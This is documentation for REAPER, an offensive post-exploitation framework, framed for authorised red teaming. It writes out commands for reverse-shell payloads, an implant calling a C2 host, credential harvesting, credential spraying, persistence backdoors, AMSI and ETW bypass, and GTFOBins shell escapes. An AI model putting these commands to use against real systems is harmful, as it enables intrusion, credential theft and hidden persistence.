Red Specter REAPER

Post-Exploitation & Offensive Operations Framework — 9 modules. 5,267 tests. Full kill chain.

v1.0.0

Contents

Overview Installation Quick Start CLI Reference Module: EXPLOIT Module: PAYLOAD Module: C2 Module: IMPLANT Module: PRIVESC Module: LATERAL Module: PERSIST Module: HARVEST Module: EVASION UNLEASHED Mode WRAITH Integration NEMESIS Integration API Reference Signature Database Disclaimer

Overview

REAPER is a post-exploitation and offensive operations framework. Nine modules covering the full kill chain from initial exploitation through persistence, lateral movement, credential harvesting, and evasion. Every capability built from scratch in pure Python. No Metasploit. No Cobalt Strike. No Empire. Pure engineering.

Nine modules. 5,267 tests. 55 CVE exploits. 14 evasion techniques. 10 persistence methods per platform. When REAPER engages a target, every exploit, every implant, every evasion technique is Python code that Red Specter wrote — not a wrapper around someone else's framework.

9 Modules Exploit, Payload, C2, Implant, PrivEsc, Lateral, Persist, Harvest, Evasion.

5,267 Tests Full test coverage across every module and capability.

55 CVE Exploits Real vulnerability exploitation with version-matched targeting.

Full Kill Chain Initial access through persistence, movement, and exfiltration.

Installation

PyPI

$ pip install red-specter-reaper

Docker

$ docker pull redspecter/reaper:latest
$ docker run --rm -it redspecter/reaper exploit --target 192.168.1.1
    

Debian

$ dpkg -i red-specter-reaper_1.0.0_amd64.deb

PKGBUILD (BlackArch / Arch)

$ makepkg -si

Or from source:

$ git clone <repo>
$ cd red-specter-reaper
$ pip install -e ".[dev]"
    

Quick Start

# Exploit a target
$ reaper exploit --target 192.168.1.1 --cve CVE-2024-1234

# Full engagement — scan, exploit, persist
$ reaper engage --target 192.168.1.0/24 --mode full

# Generate payload
$ reaper payload --type reverse_shell --format elf --lhost 10.0.0.1

# Start C2 listener
$ reaper c2 --listen --port 443 --protocol https

# Harvest credentials
$ reaper harvest --target 192.168.1.1 --session active-session-01

# UNLEASHED mode
$ reaper engage --target 192.168.1.0/24 --override --confirm-destroy
    

CLI Reference

Commands

Command	Description
reaper exploit <opts>	Exploit a target using CVE or auto-detection
reaper engage <opts>	Full engagement — scan, exploit, persist, harvest
reaper payload <opts>	Generate payloads and implants
reaper c2 <opts>	Start/manage C2 listeners and sessions
reaper implant <opts>	Deploy and manage implants on targets
reaper privesc <opts>	Enumerate and exploit privilege escalation vectors
reaper lateral <opts>	Lateral movement across the network
reaper persist <opts>	Install, verify, or remove persistence mechanisms
reaper harvest <opts>	Extract credentials, secrets, and sensitive data
reaper evasion <opts>	Apply evasion techniques to payloads and operations
reaper status	Show active sessions, listeners, and implants

Global Options

Flag	Description
--target	Target IP, hostname, CIDR range, or URL
--mode	standard, stealth, aggressive, full
--session	Session name or ID to operate on
--timeout	Operation timeout (seconds)
--output	Output directory for reports and artefacts
--override	UNLEASHED dry-run
--confirm-destroy	UNLEASHED live execution
--wraith-report	Ingest WRAITH scan report as reconnaissance input
--verbose	Verbose output with detailed operation logging
--quiet	Suppress non-essential output

Module: EXPLOIT

CVE-based exploitation engine with 55 real vulnerabilities. Version-matched targeting with automatic exploit selection. Every exploit written from scratch — no Metasploit modules, no borrowed code.

01 EXPLOIT reaper exploit

55 CVE exploits across web servers, databases, frameworks, and services
check_target() — probe target for exploitable services and versions
exploit_target() — execute a specific CVE exploit against a target
auto_exploit() — automatic vulnerability matching and sequential exploitation
Payload integration — auto-selects appropriate payload for each exploit
Version matching — semantic version comparison prevents false positive exploitation

# Check target for exploitable services
$ reaper exploit --target 192.168.1.1 --check

# Exploit specific CVE
$ reaper exploit --target 192.168.1.1 --cve CVE-2024-1234

# Auto-exploit all discovered vulnerabilities
$ reaper exploit --target 192.168.1.1 --auto
    

Module: PAYLOAD

Payload generation engine supporting multiple payload types and output formats. Generates reverse shells, bind shells, stagers, and full implants with configurable options.

02 PAYLOAD reaper payload

PayloadType enum — reverse_shell, bind_shell, stager, meterpreter, beacon, download_exec, inject
PayloadFormat enum — python, elf, pe, dll, powershell, shellcode, raw
generate() — build a payload with specified type, format, and connection parameters
generate_implant() — build a full-featured implant with C2 callback, evasion, and persistence
Encoding options — base64, XOR, AES-256 encryption for payload obfuscation
Platform targeting — Linux x64, Windows x64, cross-platform Python

# Generate reverse shell (ELF)
$ reaper payload --type reverse_shell --format elf --lhost 10.0.0.1 --lport 4444

# Generate implant with evasion
$ reaper payload --implant --format python --c2 https://c2.example.com --evasion
    

Module: C2

Command and control infrastructure. Multi-protocol listener support with encrypted session management. Handles implant callbacks, task distribution, and result collection.

03 C2 reaper c2

Protocols — HTTP, HTTPS, DNS, TCP raw, WebSocket
Session management — unique session IDs, heartbeat tracking, auto-cleanup
AES-256-GCM encryption on all C2 channels
Listener lifecycle — start, stop, restart, status per listener
Task queue — distribute commands to implants, collect results async
Multi-listener — run multiple protocols simultaneously
Jitter & sleep — configurable callback intervals with randomisation

# Start HTTPS listener
$ reaper c2 --listen --port 443 --protocol https

# Start DNS listener
$ reaper c2 --listen --port 53 --protocol dns --domain c2.example.com

# List active sessions
$ reaper c2 --sessions

# Interact with session
$ reaper c2 --interact session-01
    

Module: IMPLANT

Deployable agents with two variants: full-featured for long-term operations and minimal for constrained environments. 10 built-in capabilities with modular architecture.

04 IMPLANT reaper implant

Full variant — all 10 capabilities, C2 integration, persistence, evasion, ~45KB
Minimal variant — command execution, file transfer, basic recon, ~8KB
10 capabilities: command execution, file upload/download, screenshot, keylogger, process list, network recon, registry access, privilege check, self-destruct, update
Deployment — drop, inject, fileless, staged download
Auto-C2 callback with configurable interval and jitter
Self-update — pull new capabilities from C2 without reinstall

# Deploy full implant
$ reaper implant --deploy --variant full --target 192.168.1.1 --session session-01

# Deploy minimal implant
$ reaper implant --deploy --variant minimal --target 192.168.1.1

# List active implants
$ reaper implant --list
    

Module: PRIVESC

Privilege escalation enumeration and exploitation. GTFOBins integration, Linux kernel checks, and Windows LOLBAS techniques. Suggests and executes escalation paths automatically.

05 PRIVESC reaper privesc

GTFOBins — 20 SUID/sudo binary exploits (vim, find, python, nmap, awk, less, more, tar, zip, git, etc.)
Linux checks (15) — writable /etc/passwd, SUID binaries, cron jobs, sudo misconfigs, capability abuse, kernel exploits, NFS no_root_squash, writable PATH, Docker socket, wildcard injection
LOLBAS (10) — Windows living-off-the-land binaries (certutil, mshta, regsvr32, rundll32, bitsadmin, etc.)
enumerate() — scan target for all known escalation vectors
suggest() — rank discovered vectors by success probability and stealth
Automatic exploitation — execute the highest-ranked escalation path

# Enumerate escalation vectors
$ reaper privesc --target 192.168.1.1 --enumerate

# Suggest best escalation path
$ reaper privesc --target 192.168.1.1 --suggest

# Auto-escalate
$ reaper privesc --target 192.168.1.1 --auto --session session-01
    

Module: LATERAL

Network lateral movement via SSH, SMB, and tunnelling. Credential reuse, port forwarding, and SOCKS proxy support for pivoting through compromised hosts.

06 LATERAL reaper lateral

SSH movement — key-based and password auth, command execution, file transfer
SMB movement — share enumeration, file upload, remote execution via WMI/PsExec
Port forwarding — local and remote tunnels through compromised hosts
SOCKS proxy — dynamic port forwarding for full network access through pivot
Credential reuse — spray harvested credentials across discovered hosts
Network mapping — discover adjacent hosts and subnets from pivot position

# SSH lateral movement
$ reaper lateral --method ssh --target 192.168.1.50 --creds harvested.json

# SMB with credential spray
$ reaper lateral --method smb --target 192.168.1.0/24 --spray

# SOCKS proxy through pivot
$ reaper lateral --socks --port 1080 --session session-01

# Port forward
$ reaper lateral --forward 8080:10.0.0.5:80 --session session-01
    

Module: PERSIST

Persistence installation across Linux and Windows with stealth ratings. Install, verify, and remove persistence mechanisms. Every method rated for detection risk.

07 PERSIST reaper persist

10 Linux methods — crontab, systemd service, .bashrc/.profile, init.d, at job, SSH authorized_keys, LD_PRELOAD, udev rules, XDG autostart, PAM backdoor
8 Windows methods — Registry Run keys, Scheduled Tasks, Startup folder, WMI event subscription, DLL search order hijacking, COM object hijacking, Service creation, Bootkit
install() — deploy a persistence mechanism with specified method
verify() — check if persistence is active and functional
remove() — clean up persistence mechanism and all artefacts
Stealth ratings — each method rated LOW / MEDIUM / HIGH detection risk

Platform	Method	Stealth
Linux	crontab	MEDIUM
Linux	systemd service	MEDIUM
Linux	.bashrc/.profile	LOW
Linux	SSH authorized_keys	LOW
Linux	LD_PRELOAD	HIGH
Linux	PAM backdoor	HIGH
Windows	Registry Run keys	LOW
Windows	Scheduled Tasks	MEDIUM
Windows	WMI event subscription	HIGH
Windows	COM object hijacking	HIGH

# Install persistence (Linux crontab)
$ reaper persist --install --method crontab --session session-01

# Verify persistence is active
$ reaper persist --verify --session session-01

# Remove all persistence
$ reaper persist --remove --all --session session-01
    

Module: HARVEST

Credential extraction and secrets harvesting. Searches 35 Linux and 10 Windows credential paths. 25 regex-based secret patterns for configuration files. Shadow file extraction with hash cracking preparation.

08 HARVEST reaper harvest

35 Linux credential paths — /etc/shadow, .ssh/, .gnupg/, browser profiles, .bash_history, .env files, database configs, application credentials, keyrings, cloud CLI configs
10 Windows credential paths — SAM, SYSTEM, NTDS.dit, LSA secrets, credential vaults, browser stores, RDP saved creds, WiFi profiles, registry secrets, cached domain creds
25 secret patterns — regex matching for API keys, tokens, passwords, private keys, connection strings, AWS keys, GCP service accounts, Azure secrets, JWT tokens, database URIs
Shadow extraction — parse /etc/shadow with hash type identification (MD5, SHA-256, SHA-512, bcrypt, yescrypt)
Browser credential extraction — Chrome, Firefox, Edge stored passwords and cookies
Output — structured JSON with credential type, source, and confidence

# Harvest all credentials
$ reaper harvest --target 192.168.1.1 --session session-01

# Harvest specific type
$ reaper harvest --type ssh_keys --session session-01

# Extract shadow file
$ reaper harvest --shadow --session session-01

# Scan config files for secrets
$ reaper harvest --secrets --path /opt/app/ --session session-01
    

Module: EVASION

14 evasion techniques with a pipeline API for chaining. Polymorphic engine generates unique variants on every build. Anti-analysis capabilities detect sandboxes and debuggers.

09 EVASION reaper evasion

14 techniques: string obfuscation, control flow flattening, dead code injection, variable renaming, XOR encoding, AES encryption, base64 layering, process hollowing, DLL sideloading, timestomping, log clearing, AMSI bypass, ETW patching, syscall unhooking
Pipeline API — chain multiple techniques: pipeline([obfuscate, encrypt, inject_dead_code])
Polymorphic engine — generates structurally unique payload variants with identical functionality
Anti-analysis — VM detection, sandbox detection, debugger detection, timing checks
Auto-evasion — analyses target environment and selects optimal technique chain

14 Techniques From string obfuscation to syscall unhooking

Pipeline API Chain techniques for layered evasion

Polymorphic Engine Every build is structurally unique

Anti-Analysis VM, sandbox, and debugger detection

# Apply evasion pipeline to payload
$ reaper evasion --input payload.bin --techniques obfuscate,encrypt,dead_code

# Polymorphic generation
$ reaper evasion --input payload.bin --polymorphic --count 5

# Auto-evasion for target environment
$ reaper evasion --auto --session session-01
    

REAPER UNLEASHED

Three-tier gating. Ed25519 private key controlled. One operator. Founder's machine only.

Standard mode simulates and reports. UNLEASHED mode executes live. Full exploitation chains. Live persistence. Real credential extraction. The difference is not cosmetic — it is operational.

Three-Tier Gating

Tier 1 — Standard: Simulation mode. All exploits run in check-only mode. No payloads delivered. No persistence installed. Safe for assessment reporting.
Tier 2 — Override (dry-run): Requires --override flag and valid Ed25519 key. Shows what UNLEASHED would do without executing. Full attack plan output.
Tier 3 — UNLEASHED (live): Requires --override --confirm-destroy and valid Ed25519 key. Live exploitation. Real payloads. Active C2. Full operational capability.

Ed25519 Key Setup

# Generate UNLEASHED key pair
$ reaper keygen --algo ed25519 --output ~/.reaper/keys/

# Set key path
$ export REAPER_KEY=~/.reaper/keys/reaper_ed25519
    

Capability	Standard	UNLEASHED
Exploitation	Check only	Live exploit execution
Payload delivery	Simulated	Real payload deployment
C2 channels	Disabled	Active C2 with encryption
Persistence	Report only	Live installation
Credential harvest	Path enumeration	Full extraction
Lateral movement	Discovery only	Active pivoting
Evasion	Analysis only	Live evasion pipeline
Key required	No	Ed25519

UNLEASHED mode is restricted to authorised operators with Ed25519 private key access. Live execution against any target must only occur in authorised test environments with explicit written permission. Unauthorised use of UNLEASHED mode constitutes illegal access and may violate applicable law.

WRAITH Integration

REAPER ingests WRAITH reconnaissance reports via the --wraith-report flag. WRAITH discovers. REAPER exploits. The chain is seamless.

01 WRAITH Discovers

→

02 REAPER Exploits

→

03 PERSIST Holds

→

04 HARVEST Extracts

# Run WRAITH scan first
$ wraith scan https://target.com --output ./recon

# Feed WRAITH report into REAPER
$ reaper engage --wraith-report ./recon/wraith-report.json --mode full

# REAPER auto-maps WRAITH findings to exploits
# Ports + services → exploit selection
# CVE matches → targeted exploitation
# Default creds → credential reuse for lateral movement
    

Port & Service Mapping WRAITH port data drives REAPER exploit selection

CVE Chain WRAITH CVE matches feed directly into REAPER exploitation

Credential Reuse WRAITH default creds enable REAPER lateral movement

SSL Weaknesses WRAITH SSL findings inform REAPER C2 channel selection

NEMESIS Integration

REAPER operates as a NEMESIS weapon via the ReaperWeapon class. The Supreme Commander orchestrates REAPER alongside the other 12 weapons — selecting targets, chaining exploits, and coordinating post-exploitation across the full engagement.

01 WRAITH Recon

→

02 NEMESIS Commands

→

03 REAPER Executes

→

04 REPORT Documents

The Supreme Commander analyses reconnaissance data, selects REAPER as the post-exploitation weapon, and orchestrates the full kill chain autonomously. REAPER reports results back to NEMESIS for cross-weapon correlation and multi-stage campaign management.

ReaperWeapon Class NEMESIS weapon interface for Supreme Commander orchestration

Autonomous Chaining Supreme Commander chains REAPER with other weapons automatically

Result Correlation REAPER findings feed back into NEMESIS campaign intelligence

Multi-Stage Campaigns NEMESIS coordinates REAPER across multiple targets and phases

API Reference

Key classes and methods for programmatic use. Import directly from red_specter_reaper.

# Core imports
from red_specter_reaper.exploit import ExploitEngine, check_target, exploit_target, auto_exploit
from red_specter_reaper.payload import PayloadGenerator, PayloadType, PayloadFormat
from red_specter_reaper.c2 import C2Server, Listener, Session
from red_specter_reaper.implant import Implant, ImplantVariant
from red_specter_reaper.privesc import PrivEscEngine, enumerate, suggest
from red_specter_reaper.lateral import LateralEngine, SSHMover, SMBMover
from red_specter_reaper.persist import PersistenceEngine, PersistMethod
from red_specter_reaper.harvest import HarvestEngine, CredentialType
from red_specter_reaper.evasion import EvasionEngine, EvasionPipeline
    

ExploitEngine

engine = ExploitEngine(target="192.168.1.1")

# Check for exploitable services
results = engine.check_target()

# Exploit specific CVE
result = engine.exploit_target(cve="CVE-2024-1234")

# Auto-exploit all discovered vulnerabilities
results = engine.auto_exploit()
    

PayloadGenerator

gen = PayloadGenerator()

# Generate reverse shell
payload = gen.generate(
    payload_type=PayloadType.REVERSE_SHELL,
    payload_format=PayloadFormat.ELF,
    lhost="10.0.0.1",
    lport=4444
)

# Generate implant
implant = gen.generate_implant(
    variant=ImplantVariant.FULL,
    c2_url="https://c2.example.com",
    evasion=True
)
    

EvasionPipeline

pipeline = EvasionPipeline()

# Chain techniques
result = pipeline.run(
    input_payload=payload_bytes,
    techniques=["obfuscate", "encrypt", "dead_code", "polymorphic"]
)

# Polymorphic generation
variants = pipeline.polymorphic(input_payload=payload_bytes, count=5)
    

HarvestEngine

harvester = HarvestEngine(session="session-01")

# Harvest all credentials
creds = harvester.harvest_all()

# Extract shadow file
shadow = harvester.extract_shadow()

# Scan for secrets in config files
secrets = harvester.scan_secrets(path="/opt/app/")
    

Signature Database

REAPER ships with offline databases for exploitation, privilege escalation, and credential harvesting. No API calls. No external lookups. Everything ships with the tool.

CVE Database (55 entries)

Real CVE exploits across web servers, databases, application frameworks, and network services. Each entry includes version range, exploit code, payload integration, and severity rating.

Web Servers Apache, nginx, IIS, Tomcat, Caddy

Databases MySQL, PostgreSQL, MongoDB, Redis, Elasticsearch

Frameworks Spring, Struts, Django, Laravel, Rails

Services OpenSSH, ProFTPD, Samba, RDP, VPN

GTFOBins Database (20 binaries)

Binary	Escalation Vector	Method
vim	SUID / sudo	Shell escape via :!sh
find	SUID / sudo	-exec /bin/sh
python	SUID / sudo	os.system() shell spawn
nmap	SUID / sudo	--interactive or --script
awk	SUID / sudo	system() call
less	SUID / sudo	!sh from pager
tar	SUID / sudo / wildcard	--checkpoint-action
zip	SUID / sudo	-T -TT shell command
git	SUID / sudo	Pager shell escape
docker	Group membership	Mount host filesystem

Credential Paths

Category	Platform	Paths
System credentials	Linux	8
SSH keys & configs	Linux	5
Browser stores	Linux	6
Application configs	Linux	8
Cloud CLI configs	Linux	4
Keyrings & vaults	Linux	4
SAM / SYSTEM / NTDS	Windows	3
LSA / credential vaults	Windows	3
Browser & RDP stores	Windows	4

Secret Patterns (25 regex)

API Keys AWS, GCP, Azure, Stripe, SendGrid, Twilio

Tokens JWT, OAuth, Bearer, session tokens, refresh tokens

Credentials Password fields, connection strings, database URIs

Private Keys RSA, EC, Ed25519, PGP, SSH key blocks

Disclaimer

Red Specter REAPER is designed for authorised security testing, red team operations, and educational purposes only. You must have explicit written permission from the system owner before running any REAPER tool against a target. Post-exploitation operations carry significant risks including service disruption, data exposure, and persistent access to compromised systems. REAPER must only be used against systems you are authorised to test. Unauthorised use may violate the Computer Misuse Act 1990 (UK), the Computer Fraud and Abuse Act (US), or equivalent legislation in your jurisdiction. The authors accept no liability for misuse or damage resulting from improper use.